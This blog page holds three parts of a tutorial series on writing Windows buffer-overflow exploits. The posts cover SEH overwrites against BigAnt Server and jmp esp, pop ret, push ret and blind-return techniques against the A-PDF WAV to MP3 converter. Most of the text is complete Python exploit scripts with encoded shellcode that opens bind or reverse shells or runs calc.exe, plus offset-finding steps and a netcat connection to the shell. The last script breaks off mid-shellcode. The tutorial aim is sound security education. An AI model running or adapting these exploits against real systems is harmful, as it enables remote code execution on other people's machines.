jump to navigation

Tutorial write an exploit part 3 SEH November 6, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , ,
add a comment

In the previous tutorial we have seen some technique of buffer overflow, in most cases with the aim to overwrite the EIP with a jump esp opcode. Now let’s see how to exploit a buffer overflow through the technique of SEH.
SEH, Structured Exception Handler, it’s a component for catching and handling exceptions. Basically exception handlers are used by programmers when the program reaches a point of no return, such as a BOF. At this point the exception handler loads in the memory blocks of code and when it finds one that resolves the problem, then the program returns to run correctly.
The exploit takes advantage of this exception handler that loads the exceptions sequentially and at the beginning of each block exception there is the address that points to the next exception NEXT SEH.
So if the current block exception does not solve the problem, the program reads the NEXT SEH, that is the address that points to the next exception, and executes the block in that exception, until the end of all exceptions. If it finds one that can solve the problem, obviously the program ends.

Not all the programs with SEH are vulnerable, but only those where you can overwrite the SEH NEXT, the address that points to the next except, with arbitrary memory location. To check whether the program uses a vulnerable SEH OllyDbg is sufficient to load the plugin OllySSEH.

If we can see dlls where the SEH is vulnerable then we could overwrite the SEH address with a pop pop ret opcode so that program flow is directed to the NEXT SEH, which will contain a jump to the shellcode .

First of all we look for an application vulnerable to SEH, e.g. BigAnt Server, as shown by the following exploits tested on a Windows XP SP3 and then we try to run on Windows 7:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "x6ax19x9ax0f"    # p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Our goal is to make it work for Windows 7. With simple fixes we can adapt it to our needs and at the same time understand how to exploit a BOF with the SEH technique. Just like in the first tutorial, we calculate the offset:

root@bt:/var/www/bigant# /pentest/exploits/framework3/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8A
[ snip ]

And we put it in the exploit:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("")

payload = "Aa0Aa1Aa2A..."
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "x6ax19x9ax0f"    # p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

We attach BigAnt to OllyDbg and launch the exploit.
Obviously the application crashes, but in “view” -> “seh chain” we can see the value about SEH (30684239 in my case). Now we can calculate the exact offset for Windows 7:

/pentest/exploits/framework3/tools/pattern_offset.rb 30684239 5000
989

This means that the SEH will be overwritten after exactly 989 bytes and the NEXT SEH after 985 (989-4).

So the exploit will be like this:
[985 bytes of payload] [NEXT SEH] [SEH] [nops] [shellcode].

NEXT SEH will be overwritten with the address “xebx06x90x90”, an unconditional jump of 6 bytes to point to the nops at the beginning of the shellcode, and the SEH will be overwritten with an address that points to a pop pop ret opcode. This is because when an exception occurs, the dispatcher creates its own frame on the stack. In this frame the NEXT SEH is at ESP +8. So to overwrite it will be necessary a pop pop ret opcode which pushes 8 bytes out from the stack and gets the current value from the stack (top ESP) and puts it in the EIP.
This opcode can be found and exploited in the VBAJET32.dll with “0F9A19CD” address. So the new exploit will be as the following:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("x42" * 2000)

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "xcdx19x9ax0f"    # 0F9A19CD p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Running OllyDbg and setting a breakpoint in the address of pop pop ret “0F9A19CD” we realize that the application reaches this address (if not it means that we have done something wrong), and after the jump reaches the shellcode.
At this point you can replace the shellcode with something more interesting such as a reverse shell tcp:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blaked
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("xdaxc9xd9x74x24xf4x5dx55x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4fx79x47x70x43x30x45x50x45x30x4cx49"
"x4dx35x46x51x48x52x45x34x4cx4bx42x72x44x70x4e"
"x6bx50x52x46x6cx4ex6bx50x52x46x74x4ex6bx51x62"
"x46x48x44x4fx4fx47x42x6ax45x76x45x61x49x6fx44"
"x71x4bx70x4cx6cx45x6cx45x31x43x4cx46x62x44x6c"
"x51x30x4bx71x48x4fx44x4dx43x31x4fx37x4ax42x48"
"x70x51x42x43x67x4ex6bx50x52x44x50x4cx4bx50x42"
"x47x4cx46x61x48x50x4ex6bx43x70x42x58x4bx35x49"
"x50x44x34x43x7ax46x61x4ex30x42x70x4cx4bx51x58"
"x42x38x4cx4bx43x68x51x30x43x31x4bx63x48x63x45"
"x6cx50x49x4ex6bx46x54x4cx4bx45x51x49x46x44x71"
"x49x6fx46x51x4fx30x4cx6cx4bx71x48x4fx46x6dx43"
"x31x48x47x47x48x49x70x42x55x49x64x44x43x43x4d"
"x4cx38x45x6bx51x6dx51x34x51x65x49x72x43x68x4c"
"x4bx51x48x44x64x43x31x4bx63x42x46x4cx4bx44x4c"
"x50x4bx4ex6bx50x58x45x4cx45x51x4ax73x4cx4bx45"
"x54x4ex6bx47x71x4ax70x4dx59x43x74x47x54x46x44"
"x51x4bx43x6bx43x51x46x39x50x5ax50x51x49x6fx4b"
"x50x42x78x43x6fx43x6ax4cx4bx42x32x48x6bx4ex66"
"x51x4dx50x68x44x73x46x52x47x70x45x50x45x38x50"
"x77x51x63x46x52x43x6fx46x34x42x48x42x6cx51x67"
"x51x36x46x67x49x6fx48x55x48x38x4ax30x45x51x45"
"x50x47x70x51x39x4bx74x42x74x46x30x42x48x47x59"
"x4fx70x42x4bx43x30x4bx4fx4ax75x50x50x46x30x50"
"x50x50x50x47x30x50x50x47x30x42x70x42x48x4bx5a"
"x46x6fx4bx6fx4bx50x49x6fx4ax75x4dx47x43x5ax43"
"x35x45x38x4fx30x4ex48x43x31x45x56x42x48x45x52"
"x43x30x47x61x43x6cx4fx79x4bx56x42x4ax42x30x50"
"x56x46x37x50x68x4fx69x4ex45x43x44x43x51x49x6f"
"x4ex35x4fx75x4fx30x50x74x46x6cx4bx4fx50x4ex44"
"x48x50x75x48x6cx51x78x48x70x4fx45x4dx72x43x66"
"x49x6fx4ex35x51x7ax43x30x51x7ax44x44x50x56x51"
"x47x42x48x43x32x4ex39x49x58x43x6fx4bx4fx48x55"
"x4ex6bx44x76x50x6ax43x70x51x78x45x50x46x70x43"
"x30x43x30x50x56x43x5ax45x50x43x58x46x38x4cx64"
"x51x43x4ax45x4bx4fx4ax75x4fx63x50x53x51x7ax43"
"x30x51x46x43x63x46x37x51x78x46x62x4ax79x4ax68"
"x43x6fx49x6fx48x55x46x61x4bx73x51x39x48x46x4b"
"x35x4ax56x44x35x48x6cx4fx33x46x6ax41x41");

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "xcdx19x9ax0f"    # 0F9A19CD p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode
padding = "x90" * 1300

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + padding + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Pwned!

Here there is a video demonstration:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.

Advertisements

Tutorial write an exploit Part 2 October 29, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , , , , , , ,
1 comment so far

After having fully understood the tutorial part 1 let’s go to read the second one. In this tutorial we will see further techniques to exploit a BOF of the program a-pdf, a tool to convert WAV to MP3.

JUMP or CALL

With these techniques you use a register that contains the address where the shellcode resides and put it in EIP. This technique has been described in the tutorial part 1, with variant that could be used with a call instead of jmp.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 1002F1C3 call esp in lame_enc.dll
eip = ("xc3xf1x02x10");
nops = ("x90" * 16);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +  shellcode);

try:
    f1 = open("Drop.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

POP RETURN

If any register points directly to the shellcode but you can see the address on the stack (first, second, third address in the stack) that points to the shellcode then you can load that value into EIP by first putting a pointer to pop ret or pop pop ret (depending on where the location is found on the stack ) into EIP.
In the first tutorial we have seen that the shellcode was located exactly into EIP, it was necessary to add more 8 nops so the shellcode began at first byte.
Let’s suppose that the shellcode is located after 8 bytes. To catch it we could use a pop pop ret, by looking for in dll loaded, and then load the jmp esp to point directly to the shellcode. So we have an address that points to a pop pop ret opcode into EIP and soon after the 8 bytes (junk) there is the jmp esp opcode that jumps to the shellcode.

[ BOF ] [pop pop ret] [junk] [ jmp esp ] [nops] [shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 00428F3F jmp esp in wavtomp3.exe
# 10034207 pop pop ret in lame_enc.dll
eip = ("x07x42x03x10");
esp = ("x3fx8fx42x00");
junk = ("x42" * 8);
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + junk + esp + nops +shellcode);

try:
    f1 = open("Drop2.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

PUSH RETURN

This techinque is a little bit different from CALL a register approach. If you don’t find out anywhere a jmp or call reg opcode then you could put the address directly into the stack and do a ret. Basically you look for a push reg followed by a ret and then you put the address of this opcode into eip.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 0047A01D push esp ret in wavtomp3.exe
eip = ("x1dxa0x47x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +shellcode);

try:
    f1 = open("Drop3.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

JUMP [reg + offset]

If there is a register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or dll’s application, which will add the required bytes to the register and then jumps to the register. E.g. a jmp dword ptr [esp+8].

BLIND RETURN

A RET instruction pop the last value (4bytes) from the stack and put that address in ESP. So if you overwrite EIP with the address that perform a RET instruction, you load the value stored at ESP into EIP.

We need to:
– Overwrite the eip with the address that points to ret opcode
– Enter the address that points to the shellcode in the first 4 bytes of the ESP
So when the ret is executed, the last added 4 bytes are popped from the stack and put in EIP.

[BOF][ret opcode address][shellcode address][shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 76541842 ret in user32.dll
# 00428F3F jmp esp in wavtomp3.exe
eip = ("x42x18x54x76");
esp = ("x3fx8fx42x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + esp + nops +shellcode);

try:
    f1 = open("Drop4.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

SEH

Every application has a default exception handler which is provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanations before you can start abusing the SEH to write exploits. That’s why the next tutorial will be entirely dedicated to this technique.

The following video shows these techniques just described:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.

Tutorial write an exploit Part 1 JMP to ESP September 10, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , , ,
2 comments

This article begins a small series of tutorials that aims to make you understand in an easier and more detailed way how to build an exploit. The Internet is an inexhaustible source of knowledge and I also want to give my contribution.

In most cases when there is an exploit which takes advantage of a vulnerability, it does not work. This does not mean that there is not the vulnerability but that some small piece of the puzzle was not reassembled correctly. The goal of this first tutorial is to understand in simple steps how these vulnerabilities work, in order to write working exploits according to our needs.

Let’s start with this exploit, which allows a buffer overflow (BOF) of the program a-pdf, a tool to convert WAV to MP3.
The exploit was tested on XP with Service Pack 3. So it doesn’t work on different platform like Win7.

You can download the code below:

#!/usr/bin/env python

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

code = (
"x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
